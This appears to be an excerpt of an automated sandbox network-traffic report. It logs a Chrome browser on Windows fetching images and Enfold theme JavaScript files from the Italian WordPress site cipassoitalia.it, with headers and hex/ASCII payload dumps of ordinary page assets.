                                                                                                                                              2025-01-03 16:33:01 UTC600INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 0c 08 02 00 00 00 e0 70 7a eb 00 00 00 2b 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 7a 61 20 33 31 20 64 65 63 20 32 30 30 35 20 31 37 3a 31 33 3a 30 37 20 2b 30 31 30 30 be ae c3 bc 00 00 00 07 74 49 4d 45 07 d5 0c 1f 10 14 05 01 4f 0d 5e 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 b0 49 44 41 54 78 da 63 f8 5f 59 f9 ff ff ff af 5f ff cb c9 cd 60 60 68 85 a0 65 cb 5e fd 97 92 02 22 20 03 2e 08 54 70 aa 6b c3 77 0b 8b 3f 6b d7 32 7d d2 8e 60 70 75 e5 7a 74 e3 e1 c3 f4 a2 22 7b 06 86 9f 40 f4 e3 c7 17 86 ff ff 81 08 c4 00 8b e4 a7 18 3c f4 bf 67 7a 69 0d c7 c1 83 5b 98 95 19 18 18 7a 4a b3 0e 3c 49 c8
                                                                                                                                              Data Ascii: PNGIHDRpz+tEXtCreation Timeza 31 dec 2005 17:13:07 +0100tIMEO^pHYs~gAMAaIDATxc_Y_``he^" .Tpkw?k2}`puzt"{@<gzi[zJ<I


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              77192.168.2.164980089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC648OUTGET /wp-content/uploads/2022/09/CIPASSO_logo_600_nopoff_-300x143.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC271INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 17383
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Sun, 11 Sep 2022 14:56:05 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC16113INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 8f 08 06 00 00 00 40 82 e6 81 00 00 43 ae 49 44 41 54 78 da ed 7d 77 9c 24 65 9d fe 53 d5 69 f2 cc ce ec ce d6 e6 cc 2e 4b 58 72 94 06 01 13 8a e1 94 13 13 66 4f 4f 69 cf 43 d1 3b bd 3b d3 cf ec 89 73 de 9d 8a 9e 62 46 d1 23 88 91 20 23 59 16 58 60 03 b0 39 f6 ee cc ec ce 4e 9e 4e f5 fb e3 fb bc 57 ef 34 55 1d aa bb 67 7a b1 be 9f 4f 7f 26 f5 54 57 bd e1 f9 3e df f8 02 81 04 12 48 20 81 04 12 48 20 81 04 12 48 20 81 fc 95 8a 11 0c 41 20 81 3c ff 25 11 b7 0c 00 21 00 26 7f 65 03 c8 02 c8 f5 f4 26 03 c0 0a 24 90 40 6a 02 3c 20 e8 18 2e 2f 93 af 10 5f 61 00 0d 00 da 01 74 01 98 0f a0 8d ef 4d 03 48 02 38 0c 60 02 c0 24 5f 13 fc db 04 80 0c 80 f1 9e de a4 5d 2f cf 1f 0e 96 40 20 81 1c 13 40
                                                                                                                                              Data Ascii: PNGIHDR,@CIDATx}w$eSi.KXrfOOiC;;sbF# #YX`9NNW4UgzO&TW>H H H A <%!&e&$@j< ./_atMH8`$_]/@ @
                                                                                                                                              2025-01-03 16:33:01 UTC1270INData Raw: 73 35 cd c2 10 9c 8e 9b 06 37 d3 78 19 8c 5b f7 57 95 6b ce e7 e8 9a f8 37 48 bd dd 84 07 98 44 30 35 67 6f 92 a6 e3 c9 45 d6 e9 30 41 f0 4b 00 f6 ce 90 83 3d 06 a7 b3 6e 8a cf 3b 42 c0 0d 91 24 1c a4 32 7a 11 4d f1 0c a4 de b7 1c c5 34 48 df 9f 5b 7f fe 11 38 07 8e 1c bb 80 a5 f9 b5 32 89 b8 f5 34 27 f6 46 88 13 f3 4a 88 c3 dd 4f be 54 16 de b9 2d ea 4c 35 14 60 5f a5 4e 94 da 24 8a e9 a9 5e e5 bb 20 91 c2 63 39 d3 dd d0 98 6c 23 7d 35 06 9c 13 5a aa 75 02 74 03 a6 1e c0 d9 4f c6 73 ba 0f 5f 98 52 42 03 dc 9c 85 4a 7b 86 34 13 f0 b1 22 fd c4 43 79 73 d9 44 16 1a 2a e0 07 7c 1a 92 c3 75 23 6a d7 15 b6 14 49 42 82 19 07 38 77 bf e3 cf e7 d3 04 4c 42 4a 6e 96 72 ae 57 6b ca fe 20 9f b5 58 b3 00 55 4a d5 50 40 31 4c 5b 62 ec b4 e4 12 69 f5 4e 5b 21 0d df 6e
                                                                                                                                              Data Ascii: s57x[Wk7HD05goE0AK=n;B$2zM4H[824'FJOT-L5`_N$^ c9l#}5ZutOs_RBJ{4"CysD*|u#jIB8wLBJnrWk XUJP@1L[biN[!n


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              78192.168.2.164979789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC643OUTGET /wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC270INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 7879
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Fri, 11 Jun 2021 17:18:06 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC7879INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7c 00 00 00 9c 08 06 00 00 00 bd 5a cf 3c 00 00 01 83 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 28 91 75 91 bb 4b 03 41 10 87 bf c4 47 c4 f8 02 2d 2c 2c 82 44 41 50 f1 01 41 1b 8b 88 46 41 2d 62 04 a3 36 c9 79 49 84 5c 3c ee 12 24 d8 0a b6 82 82 68 e3 ab d0 bf 40 5b c1 5a 10 14 45 10 3b c1 5a d1 46 c3 39 97 04 22 62 66 99 9d 6f 7f bb 33 ec ce 82 33 94 54 34 b3 b2 0f b4 54 da 08 06 fc 9e f9 f0 82 c7 f5 42 35 6e 1a e8 a2 35 a2 98 fa f4 ec 78 88 b2 f6 79 8f c3 8e b7 3d 76 ad f2 e7 fe 35 f7 b2 6a 2a e0 a8 11 1e 51 74 23 2d 3c 21 3c b5 96 d6 6d de 11 6e 51 12 91 65 e1 33 e1 6e 43 2e 28 7c 67 eb d1 02 bf da 1c 2f f0 b7 cd 46 28 38 0a ce 26 61 4f fc 17 47 7f b1 92 30 34 61 79 39
                                                                                                                                              Data Ascii: PNGIHDR|Z<iCCPsRGB IEC61966-2.1(uKAG-,,DAPAFA-b6yI\<$h@[ZE;ZF9"bfo33T4TB5n5xy=v5j*Qt#-<!<mnQe3nC.(|g/F(8&aOG04ay9


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              79192.168.2.164980789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC627OUTGET /wp-content/themes/enfold/js/shortcodes.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:02 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 40642
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:02 UTC16107INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 0a 20 20 20 20 09 2f 2f 67 6c 6f 62 61 6c 20 76 61 72 69 61 62 6c 65 73 20 74 68 61 74 20 61 72 65 20 75 73 65 64 20 6f 6e 20 73 65 76 65 72 61 6c 20 6f 63 61 73 73 69 6f 6e 73 0a 20 20 20 20 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 09 0a 20 20 20 20 09 69 66 28 20 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(document).ready(function() { //global variables that are used on several ocassions $.avia_utilities = $.avia_utilities || {}; if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera
                                                                                                                                              2025-01-03 16:33:02 UTC16384INData Raw: 2f 2f 69 65 38 20 6e 65 65 64 73 20 64 69 66 66 65 72 65 6e 74 20 69 6e 73 65 72 74 20 6d 65 74 68 6f 64 0a 09 09 09 74 72 79 7b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 2e 74 65 78 74 28 63 73 73 29 3b 20 0a 09 09 09 7d 0a 09 09 09 63 61 74 63 68 28 65 72 72 29 7b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 2e 72 65 6d 6f 76 65 28 29 3b 0a 09 09 09 09 63 73 73 5f 62 6c 6f 63 6b 20 3d 20 24 28 22 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 69 64 3d 27 61 76 2d 62 72 6f 77 73 65 72 2d 68 65 69 67 68 74 27 3e 22 2b 63 73 73 2b 22 3c 2f 73 74 79 6c 65 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 27 68 65 61 64 3a 66 69 72 73 74 27 29 3b 0a 09 09 09 7d 0a 09 09 09 0a 09 09 09 0a 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f
                                                                                                                                              Data Ascii: //ie8 needs different insert methodtry{css_block.text(css); }catch(err){css_block.remove();css_block = $("<style type='text/css' id='av-browser-height'>"+css+"</style>").appendTo('head:first');}setTimeout(functio
                                                                                                                                              2025-01-03 16:33:02 UTC8151INData Raw: 30 2e 30 38 35 2c 20 30 2e 34 39 30 2c 20 31 2e 33 36 35 29 27 20 0a 09 09 7d 3b 0a 0a 09 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 09 63 68 65 63 6b 20 69 66 20 61 20 63 73 73 20 66 65 61 74 75 72 65 20 69 73 20 73 75 70 70 6f 72 74 65 64 20 61 6e 64 20 73 61 76 65 20 69 74 20 74 6f 20 74 68 65 20 73 75 70 70 6f 72 74 65 64 20 61 72 72 61 79 0a 09 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 09 24 2e
                                                                                                                                              Data Ascii: 0.085, 0.490, 1.365)' };/************************************************************************check if a css feature is supported and save it to the supported array*************************************************************************/$.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              80192.168.2.164980989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC459OUTGET /wp-content/plugins/sitepress-multilingual-cms/res/flags/it.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:02 UTC269INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 267
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 10 Dec 2020 02:53:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:02 UTC267INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 0c 08 02 00 00 00 e0 70 7a eb 00 00 00 2b 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 64 6f 20 32 39 20 64 65 63 20 32 30 30 35 20 30 32 3a 33 35 3a 33 37 20 2b 30 31 30 30 9f 03 14 04 00 00 00 07 74 49 4d 45 07 d5 0c 1d 01 28 1a 48 59 78 98 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 63 49 44 41 54 78 da dd d1 31 0e 80 20 0c 85 e1 87 e1 4c de ff 22 1e c0 86 4e 20 8e 15 8a 03 21 86 94 d5 3f 4c 25 5f 3a d4 e1 04 6e 20 02 19 2d d9 05 43 ce 0d 03 5f 4d 52 79 c1 98 54 16 d5 1c 56 53 0a 95 e5 85 3d 25 56 b6 2d 88 ae 3f 33 df 1f da 52 78 0f d0 58 d2 a7 31 f3 dc 7c 33 22 9a b3 f2 fd 00 7c d9 28 de 2d 94 57 94
                                                                                                                                              Data Ascii: PNGIHDRpz+tEXtCreation Timedo 29 dec 2005 02:35:37 +0100tIME(HYxpHYs~gAMAacIDATx1 L"N !?L%_:n -C_MRyTVS=%V-?3RxX1|3"|(-W


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              81192.168.2.164981089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC459OUTGET /wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:02 UTC269INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 600
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 10 Dec 2020 02:53:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:02 UTC600INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 0c 08 02 00 00 00 e0 70 7a eb 00 00 00 2b 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 7a 61 20 33 31 20 64 65 63 20 32 30 30 35 20 31 37 3a 31 33 3a 30 37 20 2b 30 31 30 30 be ae c3 bc 00 00 00 07 74 49 4d 45 07 d5 0c 1f 10 14 05 01 4f 0d 5e 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 01 b0 49 44 41 54 78 da 63 f8 5f 59 f9 ff ff ff af 5f ff cb c9 cd 60 60 68 85 a0 65 cb 5e fd 97 92 02 22 20 03 2e 08 54 70 aa 6b c3 77 0b 8b 3f 6b d7 32 7d d2 8e 60 70 75 e5 7a 74 e3 e1 c3 f4 a2 22 7b 06 86 9f 40 f4 e3 c7 17 86 ff ff 81 08 c4 00 8b e4 a7 18 3c f4 bf 67 7a 69 0d c7 c1 83 5b 98 95 19 18 18 7a 4a b3 0e 3c 49 c8
                                                                                                                                              Data Ascii: PNGIHDRpz+tEXtCreation Timeza 31 dec 2005 17:13:07 +0100tIMEO^pHYs~gAMAaIDATxc_Y_``he^" .Tpkw?k2}`puzt"{@<gzi[zJ<I


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              82192.168.2.164981189.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC455OUTGET /wp-content/uploads/2021/06/CiPASSO-Bistrot-Roma-userci.png HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:02 UTC270INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 7879
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Fri, 11 Jun 2021 17:18:06 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:02 UTC7879INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 7c 00 00 00 9c 08 06 00 00 00 bd 5a cf 3c 00 00 01 83 69 43 43 50 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 28 91 75 91 bb 4b 03 41 10 87 bf c4 47 c4 f8 02 2d 2c 2c 82 44 41 50 f1 01 41 1b 8b 88 46 41 2d 62 04 a3 36 c9 79 49 84 5c 3c ee 12 24 d8 0a b6 82 82 68 e3 ab d0 bf 40 5b c1 5a 10 14 45 10 3b c1 5a d1 46 c3 39 97 04 22 62 66 99 9d 6f 7f bb 33 ec ce 82 33 94 54 34 b3 b2 0f b4 54 da 08 06 fc 9e f9 f0 82 c7 f5 42 35 6e 1a e8 a2 35 a2 98 fa f4 ec 78 88 b2 f6 79 8f c3 8e b7 3d 76 ad f2 e7 fe 35 f7 b2 6a 2a e0 a8 11 1e 51 74 23 2d 3c 21 3c b5 96 d6 6d de 11 6e 51 12 91 65 e1 33 e1 6e 43 2e 28 7c 67 eb d1 02 bf da 1c 2f f0 b7 cd 46 28 38 0a ce 26 61 4f fc 17 47 7f b1 92 30 34 61 79 39
                                                                                                                                              Data Ascii: PNGIHDR|Z<iCCPsRGB IEC61966-2.1(uKAG-,,DAPAFA-b6yI\<$h@[ZE;ZF9"bfo33T4TB5n5xy=v5j*Qt#-<!<mnQe3nC.(|g/F(8&aOG04ay9


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              83192.168.2.164980889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:02 UTC440OUTGET /wp-content/themes/enfold/js/avia.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: cjs_id=21187cdf-b91f-4f27-aae8-45cec9395e7c
                                                                                                                                              2025-01-03 16:33:02 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:02 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 70105
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:02 UTC16107INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 20 20 20 20 0a 20 20 20 20 20 20 20 20 76 61 72 20 61 76 69 61 62 6f 64 79 63 6c 61 73 73 65 73 20 3d 20 41 76 69 61 42 72 6f 77 73 65 72 44 65 74 65 63 74 69 6f 6e 28 27 68 74 6d 6c 27 29 3b 0a 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 09 09 69 66 28 20 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20 4d 69 6e 69 2f
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(document).ready(function() { var aviabodyclasses = AviaBrowserDetection('html');$.avia_utilities = $.avia_utilities || {};if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/
                                                                                                                                              2025-01-03 16:33:02 UTC16384INData Raw: 20 09 24 2e 41 76 69 61 56 69 64 65 6f 41 50 49 2e 70 6c 61 79 65 72 73 5b 20 66 76 2e 61 74 74 72 28 27 69 64 27 29 2e 72 65 70 6c 61 63 65 28 2f 5f 68 74 6d 6c 35 2f 2c 27 27 29 20 5d 20 3d 20 69 6e 73 74 61 6e 63 65 3b 0a 20 20 20 20 20 20 20 20 20 09 0a 09 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 0a 09 09 09 09 7b 0a 09 09 09 09 09 69 66 20 28 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 70 6c 75 67 69 6e 54 79 70 65 20 3d 3d 20 27 66 6c 61 73 68 27 29 20 0a 09 09 09 09 09 7b 09 0a 09 09 09 09 09 09 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 61 6e 70 6c 61 79 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 66 76 2e 74 72 69 67 67 65 72 28 27 61 76 2d 6d 65 64 69 61 6a 73 2d
                                                                                                                                              Data Ascii: $.AviaVideoAPI.players[ fv.attr('id').replace(/_html5/,'') ] = instance; setTimeout(function(){if (mediaElement.pluginType == 'flash') {mediaElement.addEventListener('canplay', function() { fv.trigger('av-mediajs-
